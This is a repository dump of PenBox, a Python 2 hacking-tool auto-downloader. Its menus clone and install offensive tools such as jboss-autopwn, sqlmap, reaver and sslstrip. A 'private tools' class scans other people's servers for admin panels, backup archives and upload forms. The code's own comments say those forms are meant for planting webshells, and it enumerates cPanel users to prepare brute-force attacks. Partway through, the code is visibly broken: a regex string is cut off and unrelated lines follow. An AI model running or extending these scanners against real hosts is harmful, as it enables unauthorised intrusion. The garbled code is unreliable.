├── LICENSE.md ├── README.md ├── Versions ├── V1.0 │ └── penbox.py ├── V1.1 │ └── penbox.py ├── V1.2 │ └── penbox.py ├── V1.3 │ └── penbox.py ├── V1.4 │ └── penbox.py ├── V2.1 │ └── PenBox.py ├── V2.2 │ └── PenBox.py ├── V2.3 │ └── PenBox ├── V2.4 │ └── PenBox.py ├── V3.1 │ └── penbox.py └── V3.2 │ └── penbox.py └── penbox.py /LICENSE.md: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | THIS TOOL IS ONLY FOR EDUCATIONAL PURPOSES ONLY 3 | Copyright (c) 2016 Fedy Wesleti 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PenBox – A Penetration Testing Framework 2 | A Penetration Testing Framework , The Hacker’s Repo our hope is in the last version we will have evry script that a hacker needs 3 | #Information Gathering : 4 | + nmap 5 | + Setoolkit 6 | + Port Scanning 7 | + Host To IP 8 | + wordpress user enumeration 9 | + CMS scanner 10 | + XSStracer - checks remote web servers for Clickjacking, Cross-Frame Scripting, Cross-Site Tracing and Host Header Injection 11 | + Doork - Google Dorks Passive Vulnerability Auditor 12 | + Scan A server's Users 13 | 14 | # Password Attacks : 15 | + Cupp 16 | + Ncrack 17 | + AutoBrowser Screenshot 18 | 19 | # Wireless Testing : 20 | + reaver 21 | + pixiewps 22 | + Bluetooth Honeypot GUI Framework 23 | 24 | # Exploitation Tools : 25 | + Venom 26 | + sqlmap 27 | + Shellnoob 28 | + commix 29 | + FTP Auto Bypass 30 | + jboss-autopwn 31 | + Blind SQL Automatic Injection And Exploit 32 | + Bruteforce the Android Passcode given the hash and salt 33 | + Joomla, Mambo, PHP-Nuke, and XOOPS CMS SQL injection Scanner 34 | + cms Few 35 | + BLACKBOx 36 | + Liffy 37 | # Sniffing & Spoofing : 38 | + Setoolkit 39 | + SSLtrip 40 | + pyPISHER 41 | + SMTP Mailer 42 | 43 | # Web Hacking : 44 | + Drupal Hacking 45 | + Inurlbr 46 | + Wordpress & Joomla Scanner 47 | + Gravity Form Scanner 48 | + File Upload Checker 49 | + Wordpress Exploit Scanner 50 | + Wordpress Plugins Scanner 51 | + Shell and Directory Finder 52 | + Joomla! 1.5 - 3.4.5 remote code execution 53 | + Vbulletin 5.X remote code execution 54 | + BruteX - Automatically brute force all services running on a target 55 | + Arachni - Web Application Security Scanner Framework 56 | + Sub-domain Scanning 57 | + Wordpress Scanning 58 | + Wordpress Username Enumeration 59 | + Wordpress Backup Grabbing 60 | + Sensitive File Detection 61 | + Same-Site Scripting Scanning 62 | + Click Jacking Detection 63 | + Powerful XSS vulnerability scanning 64 | + SQL Injection vulnerability scanning 65 | 66 | #Private Tools 67 | + Get all websites 68 | + Get joomla websites 69 | + Get wordpress websites 70 | + Find control panel 71 | + Find zip files 72 | + Find upload files 73 | + Get server users 74 | + Scan from SQL injection 75 | + Scan ports (range of ports) 76 | + Scan ports (common ports) 77 | + Get server banner 78 | + Bypass Cloudflare 79 | 80 | #Post Exploitation 81 | + Shell Checker 82 | + POET 83 | + Weeman - Phishing Framework 84 | + Insecure Web Interface 85 | + Insufficient Authentication/Authorization 86 | + Insecure Network Services 87 | + Lack of Transport Encryption 88 | + Privacy Concerns 89 | + Insecure Cloud Interface 90 | + Insecure Mobile Interface 91 | + Insufficient Security Configurability 92 | + Insecure Software/Firmware 93 | + Poor Physical Security 94 | + Radium-Keylogger - Python keylogger with multiple features 95 | 96 | #Recon 97 | + Sniper 98 | 99 | #Smartphones Penetration 100 | + Attach Framework to a Deployed Agent/Create Agent 101 | + Send Commands to an Agent 102 | + View Information Gathered 103 | + Attach Framework to a Mobile Modem 104 | + Run a remote attack 105 | + Run a social engineering or client side attack 106 | + Compile code to run on mobile devices 107 | + Install Stuff 108 | + Use Drozer 109 | + Setup API 110 | + Bruteforce the Android Passcode given the hash and salt 111 | 112 | #Others 113 | + QrlJacking-Framework 114 | + Sniffles - Packet Capture Generator for IDS and Regular Expression Evaluation 115 | #Installation 116 | git clone https://github.com/x3omdax/PenBox.git 117 | -------------------------------------------------------------------------------- /Versions/V1.0/penbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | # 3 | # All In One Tool For Penetration Testing 4 | # Authors : Fedy Wesleti , Mohamed Nour 5 | # 6 | import sys 7 | import os 8 | import subprocess 9 | from commands import * 10 | ########################## 11 | #Variables 12 | yes = set(['yes','y', 'ye', '']) 13 | no = set(['no','n']) 14 | 15 | 16 | 17 | ########################## 18 | 19 | #this is the big menu funtion 20 | def menu(): 21 | print """ 22 | ######## ######## ## ## ######## ####### ## ## 23 | ## ## ## ### ## ## ## ## ## ## ## 24 | ## ## ## #### ## ## ## ## ## ## ## 25 | ######## ###### ## ## ## ######## ## ## ### 26 | ## ## ## #### ## ## ## ## ## ## 27 | ## ## ## ### ## ## ## ## ## ## 28 | ## ######## ## ## ######## ####### ## ## v1.0 29 | Pentesting Tools Auto-Downloader 30 | 31 | [+] Coded BY Mohamed Nour & Fedy Weslety [+] 32 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 33 | [+] Greetz To All Pentesters [+] 34 | 35 | Select from the menu: 36 | 37 | 1 : Information Gathering 38 | 2 : Password Attacks 39 | 3 : Wireless Testing 40 | 4 : Exploitation Tools 41 | 5 : Sniffing & Spoofing 42 | 99 : Exit 43 | 44 | """ 45 | choice = input("selet a number :") 46 | choice = int(choice) 47 | if choice == 1: 48 | info() 49 | elif choice == 2: 50 | passwd() 51 | elif choice == 3: 52 | wire() 53 | elif choice == 4: 54 | exp() 55 | elif choice == 5: 56 | snif() 57 | elif choice == 99: 58 | os.system('clear'),sys.exit(); 59 | #end of function 60 | ########################## 61 | #nmap function 62 | def nmap(): 63 | print("this step will download and install nmap ") 64 | print("yes or no ") 65 | choice7 = raw_input() 66 | if choice7 in yes : 67 | os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2") 68 | os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -") 69 | os.system("cd nmap-7.01") 70 | os.system("./configure") 71 | os.system("make") 72 | os.system("su root") 73 | os.system("make install") 74 | elif choice7 in no : 75 | info() 76 | #################################### 77 | #jboss-autopwn 78 | def jboss(): 79 | os.system('clear') 80 | print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") 81 | print ("deployed, the script uses its upload and command execution capability to") 82 | print ("provide an interactive session.") 83 | print ("") 84 | print (" this will install jboss-autopwn") 85 | print ("usage : ./e.sh target_ip tcp_port ") 86 | choice9 = raw_input("yes / no :") 87 | if choice9 in yes: 88 | os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit(); 89 | elif choice9 in no: 90 | os.system('clear'); exp() 91 | #sqlmap 92 | def sqlmap(): 93 | print (" this will install sqlmap ") 94 | print ("usage : python sqlmap.py -h") 95 | choice8 = input("yes or no :") 96 | if choice8 in yes: 97 | os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev") 98 | elif choice8 in no: 99 | os.system('clear'); info() 100 | 101 | #setoolkit 102 | def setoolkit(): 103 | print ("The Social-Engineer Toolkit is an open-source penetration testing framework") 104 | print(") designed for social engineering. SET has a number of custom attack vectors that ") 105 | print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ") 106 | print("an information security consulting firm located in Cleveland, Ohio.") 107 | print("") 108 | choiceset = raw_input("y / n :") 109 | if choiceset in yes: 110 | os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git");os.system("cd social-engineer-toolkit");os.system("python setup.py") 111 | if choiceset in no: 112 | os.system("clear"); info() 113 | #cupp 114 | def cupp(): 115 | print("cupp is a password list generator ") 116 | print("Usage: python cupp.py -h") 117 | print("yes or now") 118 | choicecupp = raw_input("y / n :") 119 | 120 | if choicecupp in yes: 121 | os.system("git clone https://github.com/Mebus/cupp.git");os.system("cd cupp") 122 | elif choicecupp in no: 123 | os.system("clear"); passwd() 124 | #ncrack 125 | def ncrack(): 126 | print("A Ruby interface to Ncrack, Network authentication cracking tool.") 127 | print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3") 128 | print("1 to accept / 0 to decline") 129 | choicencrack = raw_input("y / n :") 130 | if choicencrack in yes: 131 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git");os.system("cd ruby-ncrack");os.systemgem("install ruby-ncrack") 132 | elif choicencrack in no: 133 | os.system("clear"); passwd() 134 | #reaver 135 | def reaver(): 136 | print("Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup") 137 | print(" WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a") 138 | print(") wide variety of access points and WPS implementations") 139 | print("1 to accept / 0 to decline") 140 | creaver = input("y / n :") 141 | if creaver in yes: 142 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps");os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git");os.system("cd reaver-wps-fork-t6x");os.system("cd src/");os.system("./configure");os.system("make") 143 | elif creaver in no: 144 | os.system("clear"); wire() 145 | 146 | ##################################### 147 | #information gathering function 148 | def info(): 149 | print("1 : nmap ") 150 | print("3 : SET tool kit") 151 | print("99 :Go Back To Main Menu") 152 | choice2 = input("selet a number :") 153 | choice2 = int(choice2) 154 | if choice2 ==1: 155 | os.system('clear'); nmap() 156 | if choice2 ==3: 157 | os.system("clear"); setoolkit() 158 | 159 | elif choice2 ==99: 160 | os.system("clear"); menu() 161 | #end of menu 162 | ########################## 163 | #password attacks menu 164 | def passwd(): 165 | print("1 : cupp ") 166 | print("2 : Ncrack") 167 | print("99:Back To Main Menu") 168 | choice3 = input("selet a number :") 169 | choice3 = int(choice3) 170 | if choice3 ==1: 171 | os.system("clear"); cupp() 172 | elif choice3 ==2: 173 | os.system("clear"); ncrack() 174 | elif choice3 ==99: 175 | os.system("clear"); menu() 176 | #end of menu 177 | ########################## 178 | #wireless attacks 179 | def wire(): 180 | print("1 : reaver ") 181 | print("99: Go Back To The Main Menu") 182 | choice4 = input("selet a number :") 183 | choice4 = int(choice4) 184 | if choice4 ==1: 185 | os.system("clear");reaver() 186 | elif choice4 ==99: 187 | menu() 188 | ########################## 189 | #exploitation tools 190 | def exp(): 191 | print("1 : jboss-autopwn ") 192 | print("2 : sqlmap") 193 | print("99 : Go Back To Main Menu") 194 | choice5 = input("selet a number :") 195 | choice5 = int(choice5) 196 | if choice5 ==2: 197 | os.system("clear"); sqlmap() 198 | if choice5 ==1: 199 | os.system('clear'); jboss() 200 | elif choice5 ==99: 201 | menu() 202 | ########################### 203 | #sniffing tools 204 | def snif(): 205 | print("1 : Set Tool kit ") 206 | print("99: Back To Main Menu") 207 | choice6 = input("selet a number :") 208 | choice6 = int(choice6) 209 | if choice6 ==1: 210 | os.system("clear"); setoolkit() 211 | if choice6 ==99: 212 | os.system("clear"); menu() 213 | #end of menu 214 | ########################## 215 | #Check use OS 216 | def OS(): 217 | print( 218 | """ 219 | Choose Operating System : 220 | 1) Max OSX 221 | 2) Linux 222 | 3) Windows 223 | """) 224 | system = input(":") 225 | system = str(system) 226 | if system ==2: 227 | root() 228 | else : 229 | menu() 230 | 231 | ############################ 232 | #check root if linux 233 | def root(): 234 | if os.getuid() != 0: 235 | print("Are you root? Please execute as root") 236 | exit() 237 | ############################# 238 | #begin :D 239 | OS() 240 | 241 | 242 | 243 | 244 | 245 | -------------------------------------------------------------------------------- /Versions/V1.1/penbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | # 3 | # All In One Tool For Penetration Testing 4 | # Authors : Fedy Wesleti , Mohamed Nour 5 | # 6 | import sys 7 | import os 8 | import httplib 9 | import subprocess 10 | import re, urllib2 11 | import socket 12 | import urllib,sys,json 13 | from commands import * 14 | from platform import system 15 | from urlparse import urlparse 16 | ########################## 17 | #Variables 18 | yes = set(['yes','y', 'ye', 'Y']) 19 | no = set(['no','n']) 20 | def logo(): 21 | print """ 22 | ######## ######## ## ## ######## ####### ## ## 23 | ## ## ## ### ## ## ## ## ## ## ## 24 | ## ## ## #### ## ## ## ## ## ## ## 25 | ######## ###### ## ## ## ######## ## ## ### 26 | ## ## ## #### ## ## ## ## ## ## 27 | ## ## ## ### ## ## ## ## ## ## 28 | ## ######## ## ## ######## ####### ## ## v1.0 29 | Pentesting Tools Auto-Downloader 30 | 31 | [+] Coded BY Mohamed Nour & Fedy Weslety [+] 32 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 33 | [+] Greetz To All Pentesters [+] 34 | """ 35 | ########################## 36 | #this is the big menu funtion 37 | def menu(): 38 | print (""" 39 | ######## ######## ## ## ######## ####### ## ## 40 | ## ## ## ### ## ## ## ## ## ## ## 41 | ## ## ## #### ## ## ## ## ## ## ## 42 | ######## ###### ## ## ## ######## ## ## ### 43 | ## ## ## #### ## ## ## ## ## ## 44 | ## ## ## ### ## ## ## ## ## ## 45 | ## ######## ## ## ######## ####### ## ## v1.0 46 | Pentesting Tools Auto-Downloader 47 | 48 | [+] Coded BY Mohamed Nour & Fedy Weslety [+] 49 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 50 | [+] Greetz To All Pentesters [+] 51 | 52 | Select from the menu: 53 | 54 | 1 : Information Gathering 55 | 2 : Password Attacks 56 | 3 : Wireless Testing 57 | 4 : Exploitation Tools 58 | 5 : Sniffing & Spoofing 59 | 6 : Privat Tools 60 | 7 : Drupal Hacking 61 | 99 : Exit 62 | 63 | """) 64 | choice = raw_input("Enter Your Choice:") 65 | 66 | if choice == "1": 67 | info() 68 | elif choice == "2": 69 | passwd() 70 | elif choice == "3": 71 | wire() 72 | elif choice == "4": 73 | exp() 74 | elif choice == "5": 75 | snif() 76 | elif choice == "6": 77 | tnn() 78 | elif choice == "7": 79 | maine() 80 | elif choice == "99": 81 | os.system('clear'),sys.exit(); 82 | elif choice == "": 83 | menu() 84 | else: 85 | menu() 86 | ########################## 87 | #Host 2 ip 88 | def h2ip(): 89 | host = raw_input("Select A Host : ") 90 | ips = socket.gethostbyname(host) 91 | print(ips) 92 | ########################## 93 | #ports 94 | def ports(): 95 | os.system("clear") 96 | target = raw_input('Select a Target IP :') 97 | os.system("nmap -O -Pn %s" % target) 98 | sys.exit(); 99 | ########################## 100 | #inurlbr 101 | def ifinurl(): 102 | print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.""" 103 | print('do you have Inurlbr installed ? ') 104 | cinurl = raw_input("Y / N : ") 105 | if cinurl in yes: 106 | inurl() 107 | if cinurl in no: 108 | insinurl() 109 | elif cinurl == "": 110 | menu() 111 | else: 112 | menu() 113 | #################################### 114 | def inurl(): 115 | dork = raw_input("select a Dork:") 116 | output = raw_input("select a file to save :") 117 | os.system("./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) 118 | if cinurl in no: 119 | insinurl() 120 | elif cinurl == "": 121 | menu() 122 | else: 123 | menu() 124 | #################################### 125 | def insinurl(): 126 | os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git") 127 | os.system("chmod +x SCANNER-INURLBR/inurlbr.php") 128 | os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl") 129 | os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php") 130 | os.system("clear") 131 | inurl() 132 | #################################### 133 | #nmap function 134 | def nmap(): 135 | 136 | choice7 = raw_input("continue ? Y / N : ") 137 | if choice7 in yes : 138 | os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2") 139 | os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -") 140 | os.system("cd nmap-7.01 & ./configure") 141 | os.system("cd nmap-7.01 & make") 142 | os.system("su root") 143 | os.system("cd nmap-7.01 & make install") 144 | elif choice7 in no : 145 | info() 146 | elif choice7 == "": 147 | menu() 148 | else: 149 | menu() 150 | #################################### 151 | #jboss-autopwn 152 | def jboss(): 153 | os.system('clear') 154 | print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") 155 | print ("deployed, the script uses its upload and command execution capability to") 156 | print ("provide an interactive session.") 157 | print ("") 158 | print ("usage : ./e.sh target_ip tcp_port ") 159 | print("Continue: y/n") 160 | choice9 = raw_input("yes / no :") 161 | if choice9 in yes: 162 | os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit(); 163 | elif choice9 in no: 164 | os.system('clear'); exp() 165 | elif choice9 == "": 166 | menu() 167 | else: 168 | menu() 169 | #################################### 170 | #sqlmap 171 | def sqlmap(): 172 | print ("usage : python sqlmap.py -h") 173 | choice8 = raw_input("Continue: y/n :") 174 | if choice8 in yes: 175 | os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ") 176 | elif choice8 in no: 177 | os.system('clear'); info() 178 | elif choice8 == "": 179 | menu() 180 | else: 181 | menu() 182 | #################################### 183 | #setoolkit 184 | def setoolkit(): 185 | print ("The Social-Engineer Toolkit is an open-source penetration testing framework") 186 | print(") designed for social engineering. SET has a number of custom attack vectors that ") 187 | print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ") 188 | print("an information security consulting firm located in Cleveland, Ohio.") 189 | print("") 190 | choiceset = raw_input("y / n :") 191 | if choiceset in yes: 192 | os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git") 193 | os.system("python social-engineer-toolkit/setup.py") 194 | if choiceset in no: 195 | os.system("clear"); info() 196 | elif choiceset == "": 197 | menu() 198 | else: 199 | menu() 200 | #################################### 201 | #cupp 202 | def cupp(): 203 | print("cupp is a password list generator ") 204 | print("Usage: python cupp.py -h") 205 | choicecupp = raw_input("Continue: y/n : ") 206 | 207 | if choicecupp in yes: 208 | os.system("git clone https://github.com/Mebus/cupp.git") 209 | print("file downloaded successfully") 210 | elif choicecupp in no: 211 | os.system("clear"); passwd() 212 | elif choicecupp == "": 213 | menu() 214 | else: 215 | menu() 216 | #################################### 217 | #ncrack 218 | def ncrack(): 219 | print("A Ruby interface to Ncrack, Network authentication cracking tool.") 220 | print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3") 221 | print("Continue: y/n") 222 | choicencrack = raw_input("y / n :") 223 | if choicencrack in yes: 224 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 225 | os.system("cd ruby-ncrack") 226 | os.system("install ruby-ncrack") 227 | elif choicencrack in no: 228 | os.system("clear"); passwd() 229 | elif choicencrack == "": 230 | menu() 231 | else: 232 | menu() 233 | #################################### 234 | #reaver 235 | def reaver(): 236 | print """ 237 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 238 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 239 | wide variety of access points and WPS implementations 240 | 1 to accept / 0 to decline 241 | """ 242 | creaver = raw_input("y / n :") 243 | if creaver in yes: 244 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 245 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 246 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 247 | os.system("cd reaver-wps-fork-t6x/src/ & make") 248 | elif creaver in no: 249 | os.system("clear"); wire() 250 | elif creaver == "": 251 | menu() 252 | else: 253 | menu() 254 | #################################### 255 | #sslstrip 256 | def ssls(): 257 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 258 | attacks. 259 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 260 | cssl = raw_input("y / n :") 261 | if cssl in yes: 262 | os.system("git clone https://github.com/moxie0/sslstrip.git") 263 | os.system("sudo apt-get install python-twisted-web") 264 | os.system("python sslstrip/setup.py") 265 | if cssl in no: 266 | snif() 267 | elif cssl =="": 268 | menu() 269 | else: 270 | menu() 271 | #################################### 272 | #shellnoob 273 | def shellnoob(): 274 | print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!""" 275 | cshell = raw_input("Y / N : ") 276 | if cshell in yes: 277 | os.system("git clone https://github.com/reyammer/shellnoob.git") 278 | os.system("mv shellnoob/shellnoob.py shellnoob.py") 279 | os.system("sudo python shellnoob.py --install") 280 | if cshell in no: 281 | exp() 282 | elif cshell =="": 283 | menu() 284 | else: 285 | menu() 286 | ##################################### 287 | #information gathering function 288 | def info(): 289 | print("1: nmap ") 290 | print("2: Setoolkit") 291 | print("3: Port Scanning") 292 | print("4: Host To IP") 293 | print("99: Back To Main Menu") 294 | choice2 = raw_input("Select from the menu:") 295 | if choice2 == "1": 296 | os.system('clear'); nmap() 297 | if choice2 == "2": 298 | os.system("clear"); setoolkit() 299 | if choice2 == "3": 300 | os.system("clear"); ports() 301 | if choice2 == "4": 302 | os.system("clear"); h2ip() 303 | elif choice2 =="99": 304 | os.system("clear"); menu() 305 | elif choice2 == "": 306 | menu() 307 | else: 308 | menu() 309 | ########################## 310 | def priv8(): 311 | tnn() 312 | #password attacks menu 313 | def passwd(): 314 | print("1: cupp ") 315 | print("2: Ncrack") 316 | print("99: Back To Main Menu") 317 | choice3 = raw_input("Select from the menu:") 318 | if choice3 =="1": 319 | os.system("clear"); cupp() 320 | elif choice3 =="2": 321 | os.system("clear"); ncrack() 322 | elif choice3 =="99": 323 | os.system("clear"); menu() 324 | elif choice3 == "": 325 | menu() 326 | else: 327 | menu() 328 | ########################## 329 | #wireless attacks 330 | def wire(): 331 | print("1: reaver ") 332 | print("99: Back To The Main Menu") 333 | choice4 = raw_input("Select from the menu:") 334 | if choice4 =="1": 335 | os.system("clear");reaver() 336 | elif choice4 =="99": 337 | menu() 338 | elif choice4 == "": 339 | menu() 340 | else: 341 | menu() 342 | ########################## 343 | #exploitation tools 344 | def exp(): 345 | print("1 : jboss-autopwn ") 346 | print("2 : sqlmap") 347 | print("3 : Shellnoob") 348 | print("4 : Inurlbr") 349 | print("99 : Go Back To Main Menu") 350 | choice5 = raw_input("Select from the menu:") 351 | if choice5 =="2": 352 | os.system("clear"); sqlmap() 353 | if choice5 =="1": 354 | os.system('clear'); jboss() 355 | if choice5 =="3": 356 | os.system("clear"); shellnoob() 357 | if choice5 == "4": 358 | os.system("clear"); ifinurl() 359 | elif choice5 =="99": 360 | menu() 361 | elif choice5 == "": 362 | menu() 363 | else: 364 | menu() 365 | ########################### 366 | #sniffing tools 367 | def snif(): 368 | print("1 : Setoolkit ") 369 | print("2 : Ssltrip") 370 | print("99: Back To Main Menu") 371 | choice6 = raw_input("Select from the menu:") 372 | if choice6 =="1": 373 | os.system("clear"); setoolkit() 374 | if choice6 =="2": 375 | os.system("clear"); ssls() 376 | if choice6 =="99": 377 | os.system("clear"); menu() 378 | elif choice6 == "": 379 | menu() 380 | else: 381 | menu() 382 | ########################## 383 | #if Os is Windows 384 | def win(): 385 | os.system("clear") 386 | print("Our Tool Does Not Support Windows , run it on linux or install a virtual machine ") 387 | sys.exit(); 388 | #Check use OS 389 | ########################## 390 | def OS(): 391 | print( 392 | """ 393 | Choose Operating System : 394 | 1) Mac OSX 395 | 2) Linux 396 | 3) Windows 397 | """) 398 | system = raw_input("choose an OS : ") 399 | if system =="2": 400 | menu() 401 | elif system =="1": 402 | root() 403 | elif system =="3": 404 | win() 405 | elif system == "": 406 | OS() 407 | else: 408 | sys.exit(); 409 | ############################ 410 | #check root if linux 411 | def root(): 412 | if os.getuid() != 0: 413 | print("Are you root? Please execute as root") 414 | exit() 415 | else: 416 | menu() 417 | ############################# 418 | #priv8 menu 419 | menuu = """ 420 | 1) Get all websites 421 | 2) Get joomla websites 422 | 3) Get wordpress websites 423 | 4) Find control panel 424 | 5) Find zip files 425 | 6) Find upload files 426 | 7) Get server users 427 | 8) Scan from SQL injection 428 | 9) Crawl and scan from SQL injection 429 | 10) Scan ports (range of ports) 430 | 11) Scan ports (common ports) 431 | 12) Get server banner 432 | 13) Bypass Cloudflare 433 | 99) Exit 434 | """ 435 | ############################# 436 | #grab function 437 | def unique(seq): 438 | """ 439 | get unique from list found it on stackoverflow 440 | """ 441 | seen = set() 442 | return [seen.add(x) or x for x in seq if x not in seen] 443 | ############################ 444 | #clear screen function 445 | def clearScr() : 446 | """ 447 | clear the screen in case of GNU/Linux or 448 | windows 449 | """ 450 | if system() == 'Linux': 451 | os.system('clear') 452 | if system() == 'Windows': 453 | os.system('cls') 454 | ############################ 455 | class TNscan : #TNscan Function menu 456 | def __init__(self, serverip) : 457 | self.serverip = serverip 458 | self.getSites(False) 459 | print menuu 460 | while True : 461 | choice = raw_input(' Enter choice -> ') 462 | if choice == '1' : 463 | self.getSites(True) 464 | elif choice == '2' : 465 | self.getJoomla() 466 | elif choice == '3' : 467 | self.getWordpress() 468 | elif choice == '4' : 469 | self.findPanels() 470 | elif choice == '5' : 471 | self.findZip() 472 | elif choice == '6' : 473 | self.findUp() 474 | elif choice == '7' : 475 | self.getUsers() 476 | elif choice == '8' : 477 | self.grabSqli() 478 | elif choice == '9' : 479 | nbpages = int(raw_input(' Enter number of pages to crawl (ex : 100) -> ')) 480 | self.crawlSqli(nbpages) 481 | elif choice == '10' : 482 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 483 | self.portScanner(1, ran) 484 | elif choice == '11' : 485 | self.portScanner(2, None) 486 | elif choice == '12' : 487 | self.getServerBanner() 488 | elif choice == '13' : 489 | self.cloudflareBypasser() 490 | elif choice == '99' : 491 | print ' Goodbye' 492 | exit() 493 | con = raw_input(' Continue [Y/n] -> ') 494 | if con[0].upper() == 'N' : 495 | exit() 496 | else : 497 | clearScr() 498 | print menuu 499 | ############################ 500 | #get websites from server 501 | def getSites(self, a) : 502 | """ 503 | get all websites on same server 504 | from bing search 505 | """ 506 | lista = [] 507 | page = 1 508 | while page <= 101: 509 | try: 510 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 511 | openbing = urllib2.urlopen(bing) 512 | readbing = openbing.read() 513 | findwebs = re.findall('

", site + admin 603 | except IOError : 604 | pass 605 | ############################ 606 | #find ZIP files 607 | def findZip(self) : 608 | """ 609 | find zip files from grabbed websites 610 | it may contain useful informations 611 | """ 612 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 613 | clearScr() 614 | print "[~] Finding zip file" 615 | for site in self.sites : 616 | for zip1 in zipList : 617 | try: 618 | if urllib.urlopen(site + zip1).getcode() == 200 : 619 | print " [*] Found zip file -> ", site + zip1 620 | except IOError : 621 | pass 622 | ############################ 623 | #find upload directories 624 | def findUp(self) : 625 | """ 626 | find upload forms from grabbed 627 | websites the attacker may succeed to 628 | upload malicious files like webshells 629 | """ 630 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 631 | clearScr() 632 | print "[~] Finding Upload" 633 | for site in self.sites : 634 | for up in upList : 635 | try : 636 | if (urllib.urlopen(site + up).getcode() == 200) : 637 | html = urllib.urlopen(site + up).readlines() 638 | for line in html : 639 | if re.findall('type=file', line) : 640 | print " [*] Found upload -> ", site+up 641 | except IOError : 642 | pass 643 | ############################ 644 | #find users 645 | def getUsers(self) : 646 | """ 647 | get server users using a method found by 648 | iranian hackers i think, the attacker may 649 | do a bruteforce attack on CPanel, ssh, ftp or 650 | even mysql if it supports remote login 651 | (you can use medusa or hydra) 652 | """ 653 | clearScr() 654 | print "[~] Grabbing Users" 655 | userslist = [] 656 | for site1 in self.sites : 657 | try: 658 | site = site1 659 | site = site.replace('http://www.', '') 660 | site = site.replace('http://', '') 661 | site = site.replace('.', '') 662 | if '-' in site: 663 | site = site.replace('-', '') 664 | site = site.replace('/', '') 665 | while len(site) > 2: 666 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 667 | if 'invalid username' not in resp.lower(): 668 | print '\t [*] Found -> ', site 669 | userslist.append(site) 670 | break 671 | else : 672 | print site 673 | 674 | site = site[:-1] 675 | except: 676 | pass 677 | 678 | clearScr() 679 | for user in userslist : 680 | print user 681 | ############################ 682 | #bypass cloudflare 683 | def cloudflareBypasser(self) : 684 | """ 685 | 